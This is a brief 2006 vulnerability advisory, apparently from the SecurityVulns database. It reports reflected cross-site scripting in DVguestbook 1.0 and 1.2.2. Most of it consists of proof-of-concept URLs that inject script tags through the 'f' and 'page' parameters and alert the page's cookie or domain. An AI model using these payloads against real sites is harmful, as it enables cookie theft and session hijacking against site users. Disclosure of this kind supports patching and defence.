DVguestbook 1.0 And 1.2.2 Cross Site Scripting

2006-03-10T00:00:00
ID SECURITYVULNS:DOC:11770
Type securityvulns
Reporter Securityvulns
Modified 2006-03-10T00:00:00

Description


DVguestbook 1.0 And 1.2.2 Cross Site Scripting

Site:http://suprem.free.fr

Credit : Liz0ziM webpage:www.biyosecurity.com Mail :liz0@bsdmail.com


DVguestbook 1.0 Xss

http://victim/path/dv_gbook.php?d=0&f='"><script>alert(document.cookie)</script> http://victim/path/dv_gbook.php?d=0&f='"><script>alert(/BiyoSecurityTeam/)</script> http://victim/path/dv_gbook.php?d=0&f='"><script>alert(document.domain)</script>

DVguestbook 1.2.2 Xss

http://victim/path/index.php?page="><script>alert(document.cookie)</script> http://victim/path/index.php?page="><script>alert(/Liz0ziM/)</script> http://victim/path/index.php?page="><script>alert(document.domain)</script>


Source:

http://www.blogcu.com/Liz0ziM/326668/ http://biyosecurity.be/bugs/dvguestbook.txt